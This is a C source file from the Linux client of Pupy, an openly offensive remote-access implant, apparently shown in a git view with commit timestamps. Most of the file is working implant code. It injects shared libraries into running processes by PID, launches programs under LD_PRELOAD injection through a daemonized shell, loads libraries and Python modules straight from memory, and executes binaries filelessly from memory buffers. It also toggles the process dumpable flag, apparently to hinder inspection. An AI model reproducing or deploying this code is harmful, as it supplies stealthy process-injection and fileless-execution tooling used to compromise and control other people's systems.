pupy/client/sources-linux/pupy.c

409 lines
10 KiB
C
Raw Normal View History

/*
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
*/
#define _GNU_SOURCE
2016-08-23 16:48:10 +00:00
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <dlfcn.h>
#include <limits.h>
2016-08-23 16:48:10 +00:00
#include "debug.h"
#include "Python-dynload.h"
2016-08-23 16:48:10 +00:00
#include "daemonize.h"
2016-11-26 09:20:33 +00:00
#include <arpa/inet.h>
#include "tmplibrary.h"
2017-03-04 16:07:38 +00:00
#include <sys/mman.h>
#ifdef Linux
2017-04-03 16:40:20 +00:00
#include <sys/prctl.h>
2017-03-06 16:36:29 +00:00
#include "memfd.h"
#include "injector.h"
#endif
#include "ld_hooks.h"
#include "revision.h"
static const char module_doc[] = DOC("Builtins utilities for pupy");
static PyObject *ExecError;
#ifdef _FEATURE_PATHMAP
static PyObject *py_pathmap = NULL;
#ifndef _LD_HOOKS_NAME
static
#endif
const char *__pathmap_callback(const char *path, char *buf, size_t buf_size)
{
PyObject* result = NULL;
char *c_result = NULL;
if (!strncmp(path, "f:", 2) ||
!strncmp(path, "pupy:/", 6) ||
!strncmp(path, "pupy/", 5))
{
dprint("__pathmap_callback(%s) -> pupy -> NULL\n");
return NULL;
}
if (!py_pathmap) {
dprint("__pathmap_callback: uninitialized (should not happen)\n");
return path;
}
result = PyDict_GetItemString(py_pathmap, path);
dprint("__pathmap_callback(%s) -> %p\n", path, result);
if (!result) {
return path;
}
if (result == Py_None) {
dprint("__pathmap_callback: None\n");
return NULL;
}
c_result = PyString_AsString(result);
if (!c_result) {
dprint("__pathmap_callback: Not a string object\n");
PyErr_Clear();
return path;
}
strncpy(buf, c_result, buf_size);
return buf;
}
#endif
static PyObject *Py_get_arch(PyObject *self, PyObject *args)
{
2017-03-06 16:36:29 +00:00
#ifdef __x86_64__
return Py_BuildValue("s", "x64");
2017-03-06 16:36:29 +00:00
#elif __i386__
return Py_BuildValue("s", "x86");
2017-03-06 16:36:29 +00:00
#else
return Py_BuildValue("s", "unknown");
2017-03-06 16:36:29 +00:00
#endif
}
2016-08-23 16:48:10 +00:00
static PyObject *Py_ld_preload_inject_dll(PyObject *self, PyObject *args)
{
const char *lpCmdBuffer;
const char *lpDllBuffer;
uint32_t dwDllLenght;
PyObject* py_HookExit;
if (!PyArg_ParseTuple(args, "zs#O", &lpCmdBuffer, &lpDllBuffer, &dwDllLenght, &py_HookExit))
return NULL;
char ldobject[PATH_MAX] = {};
int cleanup_workaround = 0;
int cleanup = 1;
int fd = drop_library(ldobject, PATH_MAX, lpDllBuffer, dwDllLenght);
if (fd < 0) {
dprint("Couldn't drop library: %m\n");
return NULL;
}
#ifdef Linux
if (is_memfd_path(ldobject)) {
cleanup_workaround = 1;
cleanup = 0;
}
#endif
char cmdline[PATH_MAX*2] = {};
snprintf(
cmdline, sizeof(cmdline), "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null",
ldobject,
PyObject_IsTrue(py_HookExit),
cleanup,
2017-04-03 16:40:20 +00:00
lpCmdBuffer
);
dprint("Program to execute in child context: %s\n", cmdline);
#if defined(Linux) && !defined(DEBUG)
if (cleanup_workaround)
prctl(4, 1, 0, 0, 0);
#endif
pid_t pid = daemonize(0, NULL, NULL, false);
if (pid == 0) {
/* Daemonized context */
dprint("Daemonization complete - client\n");
execl("/bin/sh", "/bin/sh", "-c", cmdline, NULL);
unlink(ldobject);
exit(255);
}
dprint("Daemonization complete - server\n");
if (cleanup_workaround) {
sleep(2);
close(fd);
}
#if defined(Linux) && !defined(DEBUG)
if (cleanup_workaround)
prctl(4, 0, 0, 0, 0);
#endif
if (pid == -1) {
dprint("Couldn\'t daemonize: %m\n");
unlink(ldobject);
return PyInt_FromLong(-1);
}
return PyInt_FromLong(pid);
2016-08-23 16:48:10 +00:00
}
#ifdef Linux
static PyObject *Py_reflective_inject_dll(PyObject *self, PyObject *args)
{
uint32_t dwPid;
const char *lpDllBuffer;
uint32_t dwDllLenght;
int ret = 0;
if (!PyArg_ParseTuple(args, "Is#", &dwPid, &lpDllBuffer, &dwDllLenght))
return NULL;
dprint("Injection requested. PID: %d\n", dwPid);
char buf[PATH_MAX]={};
int fd = drop_library(buf, PATH_MAX, lpDllBuffer, dwDllLenght);
if (!fd) {
PyErr_SetString(ExecError, "Couldn't drop library");
return NULL;
}
int is_memfd = is_memfd_path(buf);
dprint("Injecting %s to %d\n", buf, dwPid);
injector_t *injector;
if (injector_attach(&injector, dwPid) != 0) {
PyErr_SetString(ExecError, "Injector attach failed");
return NULL;
}
#ifndef DEBUG
if (is_memfd)
prctl(4, 1, 0, 0, 0);
#endif
if (injector_inject(injector, buf) == 0) {
dprint("\"%s\" successfully injected\n", buf);
ret = 1;
}
if (is_memfd) {
#ifndef DEBUG
prctl(4, 0, 0, 0, 0);
#endif
close(fd);
} else {
unlink(buf);
}
injector_detach(&injector);
if (ret != 1) {
PyErr_SetString(ExecError, injector_error());
return NULL;
}
return PyBool_FromLong(0);
}
#endif
static PyObject *Py_load_dll(PyObject *self, PyObject *args)
{
const char *lpDllBuffer;
uint32_t dwDllLenght;
const char *dllname;
if (!PyArg_ParseTuple(args, "ss#", &dllname, &lpDllBuffer, &dwDllLenght))
return NULL;
dprint("Py_load_dll(%s)\n", dllname);
return PyLong_FromVoidPtr(memdlopen(dllname, lpDllBuffer, dwDllLenght, RTLD_LOCAL | RTLD_NOW));
}
bool
import_module(const char *initfuncname, char *modname, const char *data, size_t size) {
char *oldcontext;
dprint("import_module: init=%s mod=%s (%p:%lu)\n",
initfuncname, modname, data, size);
void *hmem = memdlopen(modname, data, size, RTLD_LOCAL | RTLD_NOW);
if (!hmem) {
dprint("Couldn't load %s: %m\n", modname);
return false;
}
void (*do_init)() = dlsym(hmem, initfuncname);
if (!do_init) {
dprint("Couldn't find sym %s in %s: %m\n", initfuncname, modname);
dlclose(hmem);
return false;
}
oldcontext = _Py_PackageContext;
_Py_PackageContext = modname;
dprint("Call %s@%s (%p)\n", initfuncname, modname, do_init);
do_init();
_Py_PackageContext = oldcontext;
dprint("Call %s@%s (%p) - complete\n", initfuncname, modname, do_init);
return true;
}
static PyObject *
Py_import_module(PyObject *self, PyObject *args) {
char *data;
int size;
char *initfuncname;
char *modname;
char *pathname;
/* code, initfuncname, fqmodulename, path */
if (!PyArg_ParseTuple(args, "s#sss:import_module",
&data, &size,
&initfuncname, &modname, &pathname)) {
return NULL;
}
dprint("DEBUG! %s@%s\n", initfuncname, modname);
if (!import_module(initfuncname, modname, data, size)) {
PyErr_Format(PyExc_ImportError,
"Could not find function %s", initfuncname);
return NULL;
}
/* Retrieve from sys.modules */
return PyImport_ImportModule(modname);
}
static PyObject *Py_mexec(PyObject *self, PyObject *args)
{
const char *buffer = NULL;
size_t buffer_size = 0;
PyObject *argv_obj = NULL;
PyObject *redirected_obj = NULL;
PyObject *detach_obj = NULL;
if (!PyArg_ParseTuple(args, "s#OOO", &buffer, &buffer_size, &argv_obj, &redirected_obj, &detach_obj))
return NULL;
Py_ssize_t argc = PySequence_Length(argv_obj);
2017-04-03 16:40:20 +00:00
if (argc < 1) {
PyErr_SetString(ExecError, "Args not passed");
return NULL;
}
bool redirected = PyObject_IsTrue(redirected_obj);
bool detach = PyObject_IsTrue(detach_obj);
char **argv = (char **) malloc(sizeof(char*) * (argc + 1));
if (!argv) {
PyErr_SetString(ExecError, "Too many args");
return NULL;
}
int i;
for (i=0; i<argc; i++) {
PyObject *arg = NULL;
arg = PySequence_GetItem(argv_obj, i);
if (arg)
argv[i] = PyString_AsString(arg);
}
argv[argc] = NULL;
int stdior[3] = { -1, -1, -1 };
2017-04-03 16:40:20 +00:00
pid_t pid = memexec(buffer, buffer_size, (const char **) argv, stdior, redirected, detach);
if (pid < 0) {
PyErr_SetString(ExecError, "Can't execute");
return NULL;
}
PyObject * p_stdin = Py_None;
PyObject * p_stdout = Py_None;
PyObject * p_stderr = Py_None;
if (redirected) {
p_stdin = PyFile_FromFile(fdopen(stdior[0], "w"), "mexec:stdin", "a", fclose);
p_stdout = PyFile_FromFile(fdopen(stdior[1], "r"), "mexec:stdout", "r", fclose);
p_stderr = PyFile_FromFile(fdopen(stdior[2], "r"), "mexec:stderr", "r", fclose);
PyFile_SetBufSize(p_stdin, 0);
PyFile_SetBufSize(p_stdout, 0);
PyFile_SetBufSize(p_stderr, 0);
}
return Py_BuildValue("i(OOO)", pid, p_stdin, p_stdout, p_stderr);
}
static PyObject *Py_is_shared_object(PyObject *self, PyObject *args)
{
#ifdef _PUPY_SO
return PyBool_FromLong(1);
#else
return PyBool_FromLong(0);
#endif
}
static PyMethodDef methods[] = {
{ "is_shared", Py_is_shared_object, METH_NOARGS, DOC("Client is shared object") },
{ "get_arch", Py_get_arch, METH_NOARGS, DOC("get current pupy architecture (x86 or x64)") },
#ifdef Linux
{ "reflective_inject_dll", Py_reflective_inject_dll, METH_VARARGS|METH_KEYWORDS,
DOC("reflective_inject_dll(pid, dll_buffer)\nreflectively inject a dll into a process. raise an Exception on failure")
},
#endif
{ "load_dll", Py_load_dll, METH_VARARGS, DOC("load_dll(dllname, raw_dll) -> ptr") },
{ "import_module", Py_import_module, METH_VARARGS,
DOC("import_module(data, size, initfuncname, path) -> module") },
{ "mexec", Py_mexec, METH_VARARGS, DOC("mexec(data, argv, redirected_stdio, detach) -> (pid, (in, out, err))") },
{ "ld_preload_inject_dll", Py_ld_preload_inject_dll, METH_VARARGS, DOC("ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid") },
{ NULL, NULL }, /* Sentinel */
};
DL_EXPORT(void)
init_pupy(void) {
PyObject *pupy = Py_InitModule3("_pupy", methods, (char *) module_doc);
if (!pupy) {
2017-04-03 16:40:20 +00:00
return;
}
PyModule_AddStringConstant(pupy, "revision", GIT_REVISION_HEAD);
ExecError = PyErr_NewException("_pupy.error", NULL, NULL);
Py_INCREF(ExecError);
PyModule_AddObject(pupy, "error", ExecError);
2019-04-26 15:44:42 +00:00
#ifdef _PUPY_SO
setup_jvm_class();
2019-04-26 15:44:42 +00:00
#endif
#ifdef _FEATURE_PATHMAP
py_pathmap = PyDict_New();
Py_INCREF(py_pathmap);
PyModule_AddObject(pupy, "pathmap", py_pathmap);
#ifndef _LD_HOOKS_NAME
set_pathmap_callback(__pathmap_callback);
#endif
#endif
}